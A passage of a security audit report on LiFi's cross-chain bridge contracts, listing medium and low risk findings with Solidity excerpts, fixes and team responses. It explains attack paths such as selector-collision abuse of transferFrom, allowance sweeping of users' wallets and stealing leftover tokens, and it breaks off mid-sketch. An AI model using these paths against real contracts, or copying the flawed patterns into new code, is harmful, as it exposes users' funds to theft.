The function _executeAndCheckSwaps() is geared towards swaps and has several checks on balances. These (and future) checks could interfere with the fee payments. Also, this is a complicated and non-transparent approach. The project has suggested seeing _executeAndCheckSwaps() as a multicall mechanism. Recommendation: Use a dedicated mechanism to pay for fees. If _executeAndCheckSwaps() is intended to be a multicall mechanism, then rename the function. LiFi: We acknowledge the risk and encourage integrators to utilize our API at this time. Spearbit: Acknowledged. +5.2.14 _executeSwaps of Executor.sol doesn't have a whitelist Severity: Medium Risk Context: Executor.sol#L323-L333, SwapperV2.sol#L67-L81 Description: The function _executeSwaps() of Executor.sol doesn't have a whitelist, whereas _executeSwaps() of SwapperV2.sol does have a whitelist. Calling arbitrary addresses is dangerous. For example, unlimited allowances can be set to allow stealing of leftover tokens in the Executor contract. Luckily, there wouldn't normally be allowances set from users to Executor.sol, so the risk is limited. Note: also see "Too generic calls in GenericBridgeFacet allow stealing of tokens". contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } contract SwapperV2 is ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { LibSwap.SwapData calldata currentSwapData = _swapData[i]; if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } Based on the comments of the LiFi project there is also the use case of calling more generic contracts, which do not return any token, e.g. NFT buy, carbon offset. It is probably better to create new functionality to do this. Recommendation: Reuse the code of SwapperV2.sol. Note: Having a whitelist also makes sure erc20Proxy won't be called. Note: This also requires adding a management interface for the whitelist, like DexManagerFacet.sol. Note: Also see issue "Move whitelist to LibSwap.swap()". Consider creating additional functionality for non-dex calls. Whitelists will also be useful here. LiFi: The LiFi team claims that they acknowledge the risk but plan to keep this contract open, as it is separate from the main LiFi protocol contract, and want to allow developers to call whatever they wish. Spearbit: Acknowledged. +5.2.15 Processing of end balances Severity: Medium Risk Context: SwapperV2.sol#L22-L60, Executor.sol#L41-L57, Swapper.sol#L22-L38 Description: The contract SwapperV2 has the following construction (twice) to prevent using any pre-existing start balance: • it gets a start balance. • it does an action. • if the end balance > start balance, it uses the difference; else (which includes start balance == end balance) it uses the end balance. So if the else clause is reached, it uses the end balance and ignores any start balance. If the action hasn't changed the balances, then start balance == end balance and this amount is used. When the action has lowered the balances, the end balance is also used.
This defeats the code's purpose. Note: normally there shouldn't be any tokens in the LiFi Diamond contract, so the risk is limited. Note: Swapper.sol has similar code. contract SwapperV2 is ILiFi { modifier noLeftovers(LibSwap.SwapData[] calldata _swapData, address payable _receiver) { ... uint256[] memory initialBalances = _fetchBalances(_swapData); ... // all kinds of actions newBalance = LibAsset.getOwnBalance(curAsset); curBalance = newBalance > initialBalances[i] ? newBalance - initialBalances[i] : newBalance; ... } function _executeAndCheckSwaps(...) ... { ... uint256 swapBalance = LibAsset.getOwnBalance(finalTokenId); ... // all kinds of actions uint256 newBalance = LibAsset.getOwnBalance(finalTokenId); swapBalance = newBalance > swapBalance ? newBalance - swapBalance : newBalance; ... } Recommendation: Consider whether any tokens left in the LiFi Diamond should be taken into account. • If so: change newBalance in the else clauses to 0. • If not: the initial balances are not relevant and the code can be simplified. Note: Executor.sol and Swapper.sol have comparable code which is different. Note: also see issue "Processing of initial balances". Note: also see issue "Integrate all variants of _executeAndCheckSwaps()". LiFi: Fixed with PR #94. Spearbit: Verified. Note: it's still not safe to keep tokens in the LiFi Diamond contract. +5.2.16 Processing of initial balances Severity: Medium Risk Context: Swapper.sol#L22-L38, Swapper.sol#L83-L96, SwapperV2.sol#L22-L39, SwapperV2.sol#L86-L93, Executor.sol#L143-L149, Executor.sol#L191-L199, Executor.sol#L242-L249, Executor.sol#L338-L345, XChainExecFacet.sol#L30-L38 Description: The LiFi code base contains two similar source files: Swapper.sol and SwapperV2.sol. One of the differences is the processing of msg.value for native tokens, see the pieces of code below. The implementation of SwapperV2.sol sends previously available native tokens to the msg.sender. The following is an exploit example. Assume that: • the LiFi Diamond contract contains 0.1 ETH. • a call is done with msg.value == 1 ETH. • _swapData[0].fromAmount == 0.5 ETH, which is the amount to be swapped. Option 1 Swapper.sol: initialBalances == 1.1 ETH - 1 ETH == 0.1 ETH. Option 2 SwapperV2.sol: initialBalances == 1.1 ETH. After the swap, getOwnBalance() is 1.1 - 0.5 == 0.6 ETH. Option 1 Swapper.sol: returns 0.6 - 0.1 == 0.5 ETH. Option 2 SwapperV2.sol: returns 0.6 ETH (so it includes the previously present ETH). Note: the implementations of noLeftovers() are also different in Swapper.sol and SwapperV2.sol. Note: this is also related to the issue "Pulling tokens by LibSwap.swap() is counterintuitive", because the ERC20 tokens are pulled in via LibSwap.swap(), whereas the msg.value is directly added to the balance. As there normally shouldn't be any tokens in the LiFi Diamond contract, the risk is limited. contract Swapper is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { address asset = _swapData[i].receivingAssetId; uint256 balance = LibAsset.getOwnBalance(asset); if (LibAsset.isNativeAsset(asset)) { balances[i] = balance - msg.value; } else { balances[i] = balance; } } return balances; } } contract SwapperV2 is ILiFi { function _fetchBalances(...) ... { ... for (uint256 i = 0; i < length; i++) { balances[i] = LibAsset.getOwnBalance(_swapData[i].receivingAssetId); } ...
} } The following functions do comparable processing of msg.value for the initial balance: • swapAndCompleteBridgeTokensViaStargate() of Executor.sol • swapAndCompleteBridgeTokens() of Executor.sol • swapAndExecute() of Executor.sol • swapAndCompleteBridgeTokens() of XChainExecFacet if (!LibAsset.isNativeAsset(transferredAssetId)) { ... } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } However, in Executor.sol the function swapAndCompleteBridgeTokensViaStargate() isn't optimal for ERC20 tokens, because ERC20 tokens are already deposited in the contract before calling this function. function swapAndCompleteBridgeTokensViaStargate(... ) ... { ... if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // doesn't correct for initial balance } else { ... } } So assume: • 0.1 ETH was in the contract. • 1 ETH was added by the bridge. • 0.5 ETH is swapped. Then the startingBalance is calculated to be 0.1 ETH + 1 ETH == 1.1 ETH. So no funds are returned to the receiver, as the end balance of 1.1 ETH - 0.5 ETH == 0.6 ETH is smaller than 1.1 ETH. Whereas this should have been (1.1 ETH - 0.5 ETH) - 0.1 ETH == 0.5 ETH. Recommendation: First implement the suggestions of "Pulling tokens by LibSwap.swap() is counterintuitive". Also consider implementing the suggestions of "Consider using wrapped native token". Also consider whether any tokens left in the LiFi Diamond and the Executor should be taken into account. • If they are: use the correction with msg.value everywhere; in function swapAndCompleteBridgeTokensViaStargate() of Executor.sol, make a correction of the initial balance with the received tokens. • If not: then the initial balances are not relevant, and _fetchBalances() and the comparable code in other functions can be removed. Also see "Processing of end balances". Also see "Integrate all variants of _executeAndCheckSwaps()". LiFi: Fixed with PR #94. Spearbit: Verified. +5.2.17 Improve dexAllowlist Severity: Medium Risk Context: SwapperV2.sol#L67-L81, Swapper.sol#L65-L78, LibAccess.sol#L13-L15, DexManagerFacet.sol, AccessManagerFacet.sol Description: The functions _executeSwaps() of both SwapperV2.sol and Swapper.sol use a whitelist to make sure the right functions in the allowed dexes are called. The checks for approveTo, callTo and signature (callData) are independent. This means that any signature is valid for any dex combined with any approveTo address. This grants more access than necessary. This is important because multiple functions can have the same signature. For example, these two functions have the same signature: • gasprice_bit_ether(int128) • transferFrom(address,address,uint256) See bytes4_signature=0x23b872dd. Note: brute forcing an innocent-looking function with a colliding signature is straightforward. The transferFrom() signature is especially dangerous because it allows sweeping tokens from other users that have set an allowance for the LiFi Diamond. If someone gets a dex whitelisted which contains a function with the same signature, then this can be abused in the current code. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); ...
} } Recommendation: In the whitelisting manager DexManagerFacet.sol, combine the dex address, approveTo and signature and whitelist them as a triple. Adapt the rest of the code (e.g. SwapperV2.sol and Swapper.sol) to match that. Note: the library LibAccess, which does something similar, already stores the pair of executor address and signature. For extra safety: before whitelisting, double check the function signatures using 4byte.directory or sig.eth.samczsun.com, both for DexManagerFacet.sol and AccessManagerFacet.sol. LiFi: We vet all of the DEX addresses before we add them to our whitelist, and quite a few of them share the same functions. We acknowledge the risk and plan to mitigate it through careful vetting of our whitelist. This should avoid selector collisions. Spearbit: Acknowledged, careful checking prevents the issue. +5.2.18 Pulling tokens by LibSwap.swap() is counterintuitive Severity: Medium Risk Context: LibSwap.sol#L30-L68, SwapperV2.sol#L67-L81, Swapper.sol#L65-L78, Executor.sol#L323-L333 Description: The function LibSwap.swap() pulls in tokens via transferFromERC20() from msg.sender when needed. When put in a loop, via _executeSwaps(), it can pull in multiple different tokens. It also doesn't detect the accidental sending of native tokens together with ERC20 tokens. This approach is counterintuitive and leads to risks. Suppose someone wants to swap 100 USDC to 100 DAI and then 100 DAI to 100 USDT. If the first swap somehow gives back fewer tokens, for example 90 DAI, then LibSwap.swap() pulls in 10 extra DAI from msg.sender. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. Another risk is that an attacker tricks a user into signing a transaction for the LiFi protocol. Within one transaction it can sweep multiple tokens from the user, cleaning out their entire wallet. Note: this requires the msg.sender having given multiple allowances to the LiFi Diamond. In Executor.sol the tokens are already deposited, so the "pull" functionality is not needed and can even result in additional issues: there, it tries to "pull" tokens from msg.sender, which is the Executor itself. With well-behaved ERC20 implementations (like OpenZeppelin, Solmate) this has no effect, however some non-standard ERC20 implementations might break. contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... for (uint256 i = 0; i < _swapData.length; i++) { ... LibSwap.swap(_lifiData.transactionId, currentSwapData); } } } library LibSwap { function swap(...) ... { ... uint256 initialSendingAssetBalance = LibAsset.getOwnBalance(fromAssetId); ... uint256 toDeposit = initialSendingAssetBalance < fromAmount ? fromAmount - initialSendingAssetBalance : 0; ... if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } } Recommendation: Use LibAsset.depositAsset() before doing _executeSwaps() / _executeAndCheckSwaps(). This also prevents accidentally sending native tokens with ERC20 tokens (as LibAsset.depositAsset() checks msg.value). In Swapper.sol / SwapperV2.sol: change function swap() to something like this:
library LibSwap {
    function swap(...) ... {
        ...
-       uint256 toDeposit = initialSendingAssetBalance < fromAmount ? fromAmount - initialSendingAssetBalance : 0;
+       if (initialSendingAssetBalance < fromAmount) revert NotEnoughFunds();
        ...
-       if (toDeposit != 0) {
-           LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit);
-       }
    }
}
This will also make sure _executeSwaps of Executor.sol doesn't pull any tokens; a sketch of this deposit-first pattern follows below.
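For illustration, a minimal sketch of the deposit-first pattern under this recommendation. The wrapper name _depositAndExecuteSwaps is hypothetical; LibAsset.depositAsset(), the LiFiData/LibSwap.SwapData types and _executeSwaps() are assumed to be as shown elsewhere in this report:
function _depositAndExecuteSwaps(
    LiFiData calldata _lifiData,
    LibSwap.SwapData[] calldata _swapData
) internal {
    // Pull the full input amount once, up front. depositAsset() also checks
    // msg.value, so native tokens cannot be sent along with ERC20 tokens by accident.
    LibAsset.depositAsset(_swapData[0].sendingAssetId, _swapData[0].fromAmount);
    // With the funds already in the contract, LibSwap.swap() never needs to pull.
    _executeSwaps(_lifiData, _swapData);
}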
Alternatively, at least change the names to something like this: • LibSwap.swap() ==> LibSwap.pullTokensAndSwap(). • _executeSwaps() ==> _pullTokensAndExecuteSwaps() (3 locations). • _executeAndCheckSwaps() ==> _pullTokensAndExecuteAndCheckSwaps() (3 locations). And consider adding an emit of toDeposit. LiFi: Fixed with PR #94 & PR #96. Spearbit: Verified. +5.2.19 Too many bytes are checked to verify the function selector Severity: Medium Risk Context: SwapperV2.sol#L77, Swapper.sol#L74, LibStorage.sol#L4-L8, DexManagerFacet.sol#L114-L143 Description: The function _executeSwaps() slices the callData with 8 bytes, while the function selector is only 4 bytes (also see the docs). So additional bytes are checked unnecessarily, which is probably unwanted. Present in both SwapperV2.sol and Swapper.sol: function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) // should be 4 ) revert ContractCallNotAllowed(); ... } } Definition of dexFuncSignatureAllowList in LibStorage.sol: struct LibStorage { ... mapping(bytes32 => bool) dexFuncSignatureAllowList; // could be bytes4 ... } Recommendation: Limit the check on function signatures to 4 bytes in SwapperV2.sol and Swapper.sol:
-appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])])
+appStorage.dexFuncSignatureAllowList[bytes4(currentSwapData.callData[:4])])
Change the type of dexFuncSignatureAllowList to bytes4:
struct LibStorage {
    ...
-   mapping(bytes32 => bool) dexFuncSignatureAllowList;
+   mapping(bytes4 => bool) dexFuncSignatureAllowList;
    ...
}
In DexManagerFacet.sol change the related functions from bytes32 to bytes4. LiFi: Fixed with PR #8. Spearbit: Verified. 5.3 Low Risk +5.3.1 Check address(self) isn't accidentally whitelisted Severity: Low Risk Context: LibAccess.sol#L32-L35, AccessManagerFacet.sol#L10-L22, DexManagerFacet.sol#L27-L57 Description: There are several access control mechanisms. If they would somehow allow the contract's own address (address(this)), risks would increase, as there are several ways to call arbitrary functions. library LibAccess { function addAccess(bytes4 selector, address executor) internal { ... accStor.execAccess[selector][executor] = true; } } contract AccessManagerFacet { function setCanExecute(...) external { ... _canExecute ? LibAccess.addAccess(_selector, _executor) : LibAccess.removeAccess(_selector, _executor); } } contract DexManagerFacet { function addDex(address _dex) external { ... dexAllowlist[_dex] = true; ... } function batchAddDex(address[] calldata _dexs) external { ... dexAllowlist[_dexs[i]] = true; ... } } Recommendation: For extra safety: consider checking that the contract's own address isn't accidentally whitelisted. LiFi: Implemented with PR #32. Spearbit: Verified. +5.3.2 Verify anyswap token Severity: Low Risk Context: AnyswapFacet.sol#L112-L145 Description: The AnyswapFacet supplies _anyswapData.token to different functions of _anyswapData.router. These functions interact with the contract behind _anyswapData.token. If _anyswapData.token were malicious, tokens could be stolen. Note: this is relevant if the LiFi contracts are called directly without using the API. function _startBridge(...) ... { ... IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }( _anyswapData.token, ...); ... IAnyswapRouter(_anyswapData.router).anySwapOutUnderlying( _anyswapData.token, ... ); ...
IAnyswapRouter(_anyswapData.router).anySwapOut( _anyswapData.token, ...); ... } Recommendation: Verify that _anyswapData.token is a real Anyswap token against an external source/contract, or whitelist the tokens. LiFi: Fixed by whitelisting the router in the following PR. Spearbit: Verified. +5.3.3 More thorough checks for DAI in swapAndStartBridgeTokensViaXDaiBridge() Severity: Low Risk Context: GnosisBridgeFacet.sol#L78-L112 Description: The function swapAndStartBridgeTokensViaXDaiBridge() checks lifiData.sendingAssetId == DAI, however it doesn't check that the result of the swap is DAI (e.g. _swapData[_swapData.length - 1].receivingAssetId == DAI). function swapAndStartBridgeTokensViaXDaiBridge(...) ... { ... if (lifiData.sendingAssetId != DAI) { revert InvalidSendingToken(); } gnosisBridgeData.amount = _executeAndCheckSwaps(lifiData, swapData, payable(msg.sender)); ... _startBridge(gnosisBridgeData); // sends DAI } Recommendation: Consider checking _swapData[_swapData.length - 1].receivingAssetId == DAI. LiFi: Fixed with PR #24. Spearbit: Verified. +5.3.4 Funds transferred via Connext may be lost on destination due to incorrect receiver or calldata Severity: Low Risk Context: AmarokFacet.sol#L128-L129, NXTPFacet.sol#L134-L137 Description: _startBridge() in AmarokFacet.sol and NXTPFacet.sol sets a user-provided receiver and call data for the destination chain. • The receiver is intended to be the LifiDiamond contract address on the destination chain. • The call data is intended such that the functions completeBridgeTokensVia{Amarok/NXTP}() or swapAndCompleteBridgeTokensVia{Amarok/NXTP}() are called. In case of a frontend bug or a user error, these parameters can be malformed, which will lead to stuck (or stolen) funds on the destination chain. Since the addresses and functions are already known, the contract can construct this data itself instead of taking it from the user. Recommendation: When swaps on the destination are not needed, set callData to empty bytes, and receiver to be the final receiver of funds. Thus, the functions completeBridgeTokensViaAmarok() and completeBridgeTokensViaNXTP() can be removed. When swaps on the destination are needed, create the call data in _startBridge() with swapAndCompleteBridgeTokensVia{Amarok/NXTP}() and its arguments encoded, to reduce trust in user-provided data. In this case, the receiver (from Connext's perspective) is the LifiDiamond contract. Consider one of the following approaches to avoid taking this argument from the user: • If the LiFi protocol is only deployed on EVM-compatible chains, use LifiDiamond's constant address deployed via CREATE2. • If there is a chance of having different LifiDiamond addresses, create a mapping from Nomad ID to LifiDiamond address which can only be modified by the owner. Use the destination Nomad ID to get the receiver address. LiFi: Implemented with PR #77. When swaps on destination are needed, we will continue to rely on the API-generated calldata at this time. Spearbit: Verified. +5.3.5 Check output of swap is equal to amount bridged Severity: Low Risk Context: PolygonBridgeFacet.sol#L64-L121 Description: The result of the swap (amount) isn't always checked to be the same as the bridged amount (_bridgeData.amount). This way tokens could stay in the LiFi Diamond if a swap returns more tokens than are bridged. function swapAndStartBridgeTokensViaPolygonBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ...
_startBridge(_lifiData, _bridgeData, true); } function _startBridge(..., BridgeData calldata _bridgeData, ...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { rootChainManager.depositEtherFor{ value: _bridgeData.amount }(_bridgeData.receiver); } else { ... LibAsset.maxApproveERC20(IERC20(_bridgeData.assetId), _bridgeData.erc20Predicate, _bridgeData.amount); bytes memory depositData = abi.encode(_bridgeData.amount); rootChainManager.depositFor(_bridgeData.receiver, _bridgeData.assetId, depositData); } ... } Recommendation: Check that the output of the swap is equal to the amount bridged, or send the remaining tokens to the msg.sender. Note: also see issue "Use same layout for facets". LiFi: Fixed with PR #68. Spearbit: Verified. +5.3.6 Missing timelock logic on the DiamondCut facets Severity: Low Risk Context: LibDiamond.sol Description: In the LiFi Diamond, any facet address/function selector can be changed by the contract owner. For comparison, in Connext the Diamond should go through a proposal window with a delay of 7 days. function diamondCut( FacetCut[] calldata _diamondCut, address _init, bytes calldata _calldata ) external override { LibDiamond.enforceIsContractOwner(); LibDiamond.diamondCut(_diamondCut, _init, _calldata); } Recommendation: Consider implementing timelock logic when updating facet addresses/function selectors. LiFi: The LiFi team claims that they don't plan to add this at this time; will revisit in the future. Spearbit: Acknowledged. +5.3.7 Data from emit LiFiTransferStarted() can't be relied on Severity: Low Risk Context: OmniBridgeFacet.sol#L34-L107 Description: Most of the functions emit an event like LiFiTransferStarted(). Some of the fields of the emits are (sometimes) verified, but most fields come from the input variable _lifiData. The problem with this is that anyone can send transactions directly to the LiFi bridge and supply wrong data for the emit. For example: transfer a lot of Doge coins and claim in the emit to be transferring wrapped BTC. The statistics would then say a large amount of volume has been transferred, while in reality it is negligible. The advantage of using a blockchain is that the data is (seen as) reliable. If the data isn't reliable, it isn't worth the trouble (gas cost) to store it in a blockchain, and it could just as well be stored in an offline database. As a result, it is not useful to create a subgraph on the emit data (because it is unreliable). This would mean a lot of extra work for subgraph builders to reverse engineer what is going on. Also, any kickback fees to integrators or referrers cannot be based on this data because it is unreliable. User interfaces & dashboards could also display the wrong information. function startBridgeTokensViaOmniBridge(LiFiData calldata _lifiData, ...) ... { ... LibAsset.depositAsset(_bridgeData.assetId, _bridgeData.amount); _startBridge(_lifiData, _bridgeData, _bridgeData.amount, false); } function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... // do actions emit LiFiTransferStarted( _lifiData.transactionId, "omni", "", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); } Recommendation: Consider checking the data. One way to do this would be for the API to sign the data and have the signature checked on-chain. LiFi: We decided not to validate the chainId for some bridges like Amarok and Stargate as we would incur high gas costs for storing mappings and decoding payloads.
Spearbit: Verified + acknowledged for _lifiData.transactionId, _lifiData.integrator, _lifiData.referrer and the chainId for Amarok and Stargate. +5.3.8 Missing emit in XChainExecFacet Severity: Low Risk Context: Executor.sol#L178-L221, XChainExecFacet.sol#L17-L52 Description: The function swapAndCompleteBridgeTokens of Executor does do an emit of LiFiTransferCompleted, while the comparable function in XChainExecFacet doesn't do this emit. This way there will be missing emits. contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... emit LiFiTransferCompleted( ... ); } } contract XChainExecFacet is SwapperV2, ReentrancyGuard { function swapAndCompleteBridgeTokens(LiFiData calldata _lifiData, ... ) ... { ... // no emit } } Recommendation: Implement the emits in a consistent way. LiFi: The file is deleted with the following PR. Spearbit: Verified. +5.3.9 Different access control to withdraw funds Severity: Low Risk Context: WithdrawFacet.sol#L42-L44, WithdrawFacet.sol#L70 Description: To withdraw any stuck tokens, WithdrawFacet.sol provides two functions: executeCallAndWithdraw() and withdraw(). Both have different access controls on them. • executeCallAndWithdraw() can be called by the owner, or if msg.sender has been approved to call a function whose signature matches that of executeCallAndWithdraw(). • withdraw() can only be called by the owner. If the function signature of executeCallAndWithdraw() clashes with an approved signature in the execAccess mapping, the approved address can steal all the funds in the LifiDiamond contract. Recommendation: • Update executeCallAndWithdraw() so that it can only be called by the owner. • Or, check that no other function with a signature clashing with executeCallAndWithdraw() is added to execAccess. LiFi: Acknowledged. Spearbit: Acknowledged. +5.3.10 Use internal where possible Severity: Low Risk Context: StargateFacet.sol#L160, StargateFacet.sol#L180, Executor.sol#L132, Executor.sol#L272-L288 Description: Several functions have an access control where msg.sender is compared to address(this), which means they can only be called from the same contract. In the current code, with the various generic call mechanisms, this isn't a safe check. For example, the function _execute() from Executor.sol can circumvent this check. Luckily, the functions where this has been used have a low risk profile, so the risk of this issue is limited. function swapAndCompleteBridgeTokensViaStargate(...) ... { if (msg.sender != address(this)) { revert InvalidCaller(); } ... } Recommendation: Make the functions internal and remove the (msg.sender != address(this)) check. If necessary, move modifiers to the calling function. LiFi: Deprecated with PR #73. Spearbit: Verified. +5.3.11 Event of transfer is not emitted in the AxelarFacet Severity: Low Risk Context: AxelarFacet.sol#L30-L89, Executor.sol#L272-L316 Description: The usage of the LiFi protocol depends largely on the off-chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. The events are useful to record these actions on-chain for off-chain monitors/tools/interfaces when integrating with off-chain APIs. Although other facets emit the LiFiTransferStarted event, AxelarFacet does not emit this event. contract AxelarFacet { function executeCallViaAxelar(...) ... {} function executeCallWithTokenViaAxelar(...) ...
{} } On the receiving side, the Executor contract does do an emit in function _execute() but not in function _executeWithToken(). contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _execute(...) ... { ... emit AxelarExecutionComplete(callTo, bytes4(callData)); } function _executeWithToken( ... // no emit } } Recommendation: Because of the integration with off-chain APIs, ensure that all events are implemented in the facets and on the receiving side. LiFi: Fixed with PR #67. Spearbit: Verified. +5.3.12 Improve checks on the facets Severity: Low Risk Context: AxelarFacet.sol#L69, CBridgeFacet.sol#L95-L106, GnosisBridgeFacet.sol#L120, HopFacet.sol#L115-L126, HyphenFacet.sol#L106-L112, Executor.sol#L309 Description: In the facets, receiver/destination address and amount checks are missing. • The symbol parameter is used to get the address of a token with the gateway's tokenAddresses function, which looks the token address up in a mapping. If the symbol does not exist, the token address can be zero. AxelarFacet and Executor do not check if the given symbol exists. contract AxelarFacet { function executeCallWithTokenViaAxelar(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } function initAxelar(address _gateway, address _gasReceiver) external { s.gateway = IAxelarGateway(_gateway); s.gasReceiver = IAxelarGasService(_gasReceiver); } } contract Executor { function _executeWithToken(...) ... { address tokenAddress = s.gateway.tokenAddresses(symbol); } } • GnosisBridgeFacet, CBridgeFacet, HopFacet and HyphenFacet are missing receiver address/amount checks. contract CBridgeFacet { function _startBridge(...) ... { ... _cBridgeData.receiver ... } } contract GnosisBridgeFacet { function _startBridge(...) ... { ... gnosisBridgeData.receiver ... } } contract HopFacet { function _startBridge(...) ... { ... _hopData.recipient, ... } } contract HyphenFacet { function _startBridge(...) ... { ... _hyphenData.recipient ... } } Recommendation: Implement the necessary checks (receiver address and bridge amount) on the facets. LiFi: Fixed with PR #63. Spearbit: Verified. +5.3.13 Use keccak256() instead of hex Severity: Low Risk Context: ReentrancyGuard.sol#L10, AxelarFacet.sol#L11, OwnershipFacet.sol#L13, PeripheryRegistryFacet.sol#L11, StargateFacet.sol#L18, LibAccess.sol#L9-L10, LibDiamond.sol#L7 Description: Several NAMESPACEs are defined, some with a hex value and some with a keccak256(). To be able to verify they are all different, it is better to use the same format everywhere. If two of them were to use the same value, the variables stored at that location could interfere with each other and the LiFi Diamond could start to behave unreliably.
ReentrancyGuard.sol: ... NAMESPACE = hex"a6...";
AxelarFacet.sol: ... NAMESPACE = hex"c7..."; // keccak256("com.lifi.facets.axelar")
OwnershipFacet.sol: ... NAMESPACE = hex"cf..."; // keccak256("com.lifi.facets.ownership");
PeripheryRegistryFacet.sol: ... NAMESPACE = hex"dd..."; // keccak256("com.lifi.facets.periphery_registry");
StargateFacet.sol: ... NAMESPACE = keccak256("com.lifi.facets.stargate");
LibAccess.sol: ... ACCESS_MANAGEMENT_POSITION = hex"df..."; // keccak256("com.lifi.library.access.management")
LibDiamond.sol: ... DIAMOND_STORAGE_POSITION = keccak256("diamond.standard.diamond.storage");
Recommendation: Change all lines to use the keccak256() format and optionally add the hex notation. Preferably use NAMESPACE everywhere, except for the standard LibDiamond.sol.
-ReentrancyGuard.sol: ... NAMESPACE = hex"a6...";
+ReentrancyGuard.sol: ... NAMESPACE = keccak256("com.lifi.reentrancyguard"); // hex"a6...";
-AxelarFacet.sol: ... NAMESPACE = hex"c7..."; // keccak256("com.lifi.facets.axelar")
+AxelarFacet.sol: ... NAMESPACE = keccak256("com.lifi.facets.axelar"); // hex"c7...";
-OwnershipFacet.sol: ... NAMESPACE = hex"cf..."; // keccak256("com.lifi.facets.ownership");
+OwnershipFacet.sol: ... NAMESPACE = keccak256("com.lifi.facets.ownership"); // hex"cf...";
-PeripheryRegistryFacet.sol: ... NAMESPACE = hex"dd..."; // keccak256("com.lifi.facets.periphery_registry");
+PeripheryRegistryFacet.sol: ... NAMESPACE = keccak256("com.lifi.facets.periphery_registry"); // hex"dd...";
-LibAccess.sol: ... ACCESS_MANAGEMENT_POSITION = hex"df..."; // keccak256("com.lifi.library.access.management")
+LibAccess.sol: ... NAMESPACE = keccak256("com.lifi.library.access.management"); // hex"df...";
-StargateFacet.sol: ... NAMESPACE = keccak256("com.lifi.facets.stargate");
+StargateFacet.sol: ... NAMESPACE = keccak256("com.lifi.facets.stargate"); // hex"..."
LiFi: Fixed with PR #38. Spearbit: Verified. +5.3.14 Remove redundant Swapper.sol Severity: Low Risk Context: Swapper.sol, SwapperV2.sol, WormholeFacet.sol#L13 Description: There are two versions of Swapper.sol (i.e. Swapper.sol and SwapperV2.sol) which are functionally more or less the same. The WormholeFacet contract is the only one still using Swapper.sol. Having two versions of the same code is confusing and difficult to maintain. import { Swapper } from "../Helpers/Swapper.sol"; contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { } Recommendation: Remove Swapper.sol and fix any issues in SwapperV2.sol (see other issues in this document for issues with SwapperV2.sol). LiFi: Swapper.sol is removed with PR #27. Spearbit: Verified. +5.3.15 Use additional checks for transferFrom() Severity: Low Risk Context: AxelarFacet.sol#L59-L89, ERC20Proxy.sol#L38-L47, FusePoolZap.sol#L41-L73, LibSwap.sol#L30-L68 Description: Several functions transfer tokens via transferFrom() without checking the return code. Some of the contracts do not cover edge cases of non-standard ERC20 tokens that do not revert on failed transfers: some ERC20 implementations don't revert if the balance is insufficient, but return false. Other functions transfer tokens without checking that the amount of tokens received is equal to the amount of tokens requested. This is relevant for tokens that withhold a fee. Luckily there is always additional code, like bridge, dex or pool code, that verifies the amount of tokens received, so the risk is limited. contract AxelarFacet { function executeCallWithTokenViaAxelar(... ) ... { ... IERC20(tokenAddress).transferFrom(msg.sender, address(this), amount); // no check on return code & amount of tokens ... } } contract ERC20Proxy is Ownable { function transferFrom(...) ... { ... IERC20(tokenAddress).transferFrom(from, to, amount); // no check on return code & amount of tokens ... } } contract FusePoolZap { function zapIn(...) ... { ... IERC20(_supplyToken).transferFrom(msg.sender, address(this), _amount); // no check on return code & amount of tokens } } library LibSwap { function swap(...) ... { ... LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); // no check on amount of tokens } } Recommendation: Always use LibAsset.transferFromERC20() in combination with a check on the amount of tokens received, like in LibAsset.depositAsset(); a sketch of such a check follows below.
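As an illustration only, a minimal sketch of such a balance-checked pull, assuming OpenZeppelin's SafeERC20; the library name SafePull and function name pullExact are hypothetical and not part of the LiFi codebase:
pragma solidity ^0.8.17;

import { IERC20 } from "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import { SafeERC20 } from "@openzeppelin/contracts/token/ERC20/utils/SafeERC20.sol";

library SafePull {
    using SafeERC20 for IERC20;

    error InvalidAmount();

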